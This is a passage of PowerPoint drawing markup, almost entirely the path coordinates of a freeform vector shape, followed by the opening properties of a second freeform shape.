                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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5144" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
